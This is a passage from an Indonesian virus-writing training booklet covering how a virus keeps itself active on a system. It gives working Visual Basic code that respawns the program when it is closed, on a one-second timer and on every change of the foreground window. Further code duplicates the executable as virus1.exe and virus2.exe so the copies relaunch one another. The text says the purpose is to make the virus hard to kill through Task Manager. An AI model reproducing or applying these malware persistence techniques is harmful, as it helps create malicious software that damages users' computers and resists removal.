Pelatihan Pembuatan Virus Pengaktifan Virus Pada Sistem The Black VB Pengaktifan Virus pada Sistem Jika virus telah melakukan penggandaan di system computer maka virus tersebut akan mengaktifkan hasil penggandaannya yang telah berada disistem, sehingga meskipun flashdisk atau pun media penyimpanan lainnya yang digunakan sebagai suatu sarana penyebaran virus tersebut dilepas maka virus tersebut akan tetap aktif. Untuk melakukan pengaktifan virus yang telah berada pada system computer virus tersebut hanya melakukan suatu perintah untuk menjalankan virus yang berada di sisem computer tersebut dengan perintah Shell atau dengan perintah ShellExecute. Pangaktifan akan dilakukan bila terjadi suatu proses atau pemanggilan suatu aplikasi. Virus biasanya akan memanggil dirinya kembali sehingga jika salah virus dimatikan dari task manager maka virus yang prosesnya belum dimatikan akan memanggilnya kembali. Jadi tehnik ini cukup menyulit sesorang membunuh virus tersebut. Code untuk melakukan pengaktifan: Shell Lokasi+namafile,Window Style Berikut ini adalah contoh sederhana: Kamu siapkan terlebih dahulu satu buah command button. Private Sub Command1_Click() Dim lokasi As String, namafile As String With App lokasi = .Path & "\" namafile = .EXEName End With Shell lokasi & namafile & ".exe", vbNormalFocus End Sub Jadi dengan perintah tersebut kita mampu menjalankan program apapun termasuk juga virus. Extensi nggak masalah karena jika membuat suatu file execute tanpa extensi, kita bisa menjalankannya dengan perintah shell tapi jika menggunakan langsung double-click pada windows tidak akan bisa. Selanjutnya membuat suatu program yang tidak bisa ditutup dengan menge-click tombol x pada windows: Dim lokasi As String Dim namafile As String Private Sub Form_Load() With App lokasi = .Path & "\" namafile = .EXEName End With DNA [eXTR!M] Memori Club Page 14 Pelatihan Pembuatan Virus Pengaktifan Virus Pada Sistem The Black VB End Sub Private Sub Form_Unload(Cancel As Integer) Shell lokasi & namafile & ".exe", vbNormalFocus End Sub Dengan perintah diatas maka program tersebut akan melakukan pemanggilan dirinya kembali ketika ditutup dengan menekan tombol x di sudut kanan atas. Itu bisa terjadi dengan mengetikan perintah shell pada event Form_Unload Berikutnya code pengaktifan setiap detik Siapkan sebuah timer dengan Interval=1000 artinya akan menjalankan suatu perintah pada event timer setiap satu detik. 1 detik= 1000 millidetik. Dim lokasi As String Dim namafile As String Dim detik As Integer Private Sub Form_Load() If App.PrevInstance Then End With App lokasi = .Path & "\" namafile = .EXEName End With End Sub Private Sub Timer1_Timer() Shell lokasi & namafile, vbNormalFocus End Sub Dengan mengisikan perintah pengaktifan pada event Timer maka program akan melakukan pengaktifan setiap satu detik. Disini kita juga harus menyiap penganan agar program hanya dapat berjalan sekali saja, dengan perintah: If App.PrevInstance Then End Pada code berikut program akan melakukan pengaktifan jika suatu program mendapatkan focus: Private Declare Function GetForegroundWindow Lib "user32" () As Long Dim GFW As Long Dim PrevGFW As Long Dim lokasi As String Dim namafile As String DNA [eXTR!M] Memori Club Page 15 Pelatihan Pembuatan Virus Pengaktifan Virus Pada Sistem The Black VB Private Sub Form_Load() With App If .PrevInstance Then End lokasi = .Path & "\" namafile = .EXEName & ".exe" End With End Sub Private Sub Timer1_Timer() GFW = GetForegroundWindow If GFW <> Me.hWnd And PrevGFW <> GFW Then Shell lokasi & namafile, vbNormalFocus PrevGFW = GFW End If End Sub Private Declare Function GetForegroundWindow Lib "user32" () As Long GetForegroundWindow digunakan untuk mendapatkan nilai handle dari suatu objek/program yang mendapatkan focus. Setelah nilai handle tersebut didapat maka akan dilakukan pengecekan apakah handle tersebut tidak sama dengan diri sendiri dan handle sebelumnya jika tidak sama jalankan proses pengaktifan. Berikut ini adalah kode pengaktifan yang baik: Private Declare Function GetForegroundWindow Lib "user32" () As Long Dim GFW As Long Dim PrevGFW As Long Dim lokasi As String Dim namafile Private Sub Form_Load() namafile = Array("virus1.exe", "virus2.exe", App.EXEName & ".exe") If App.PrevInstance Then End lokasi = App.Path & "\" If Dir(lokasi & namafile(0)) = "" Or Dir(lokasi & namafile(1)) = "" Then FileCopy lokasi & namafile(2), lokasi & namafile(0) FileCopy lokasi & namafile(2), lokasi & namafile(1) End If End Sub Private Sub Timer1_Timer() GFW = GetForegroundWindow If Me.hWnd <> GFW And PrevGFW <> GFW Then Shell App.Path & "\" & namafile(0), vbNormalFocus DNA [eXTR!M] Memori Club Page 16 Pelatihan Pembuatan Virus Pengaktifan Virus Pada Sistem The Black VB Shell App.Path & "\" & namafile(1), vbNormalFocus PrevGFW = GFW End If End Sub Private Sub Form_Unload(Cancel As Integer) Shell lokasi & namafile(0), vbNormalFocus Shell lokasi & namafile(1), vbNormalFocus End Sub Pertama kali ketika virus dijalankan sang virus akan menduplikat dirinya dengan nama Virus1.exe dan Virus2.exe yang diambil dari Array. namafile = Array("virus1.exe", "virus2.exe", App.EXEName & ".exe") Penduplikatan dilakukan dengan perintah: FileCopy lokasi & namafile(2), lokasi & namafile(0) FileCopy lokasi & namafile(2), lokasi & namafile(1) Setelah itu virus akan menjalankan hasil duplikat tersebut setiap terjadi perubahan nilai handle. GFW = GetForegroundWindow If Me.hWnd <> GFW And PrevGFW <> GFW Then Shell App.Path & "\" & namafile(0), vbNormalFocus Shell App.Path & "\" & namafile(1), vbNormalFocus PrevGFW = GFW End If Virus akan menjalakan hasil duplicate apabila virus tersebut ditutup. Private Sub Form_Unload(Cancel As Integer) Shell lokasi & namafile(0), vbNormalFocus Shell lokasi & namafile(1), vbNormalFocus End Sub DNA [eXTR!M] Memori Club Page 17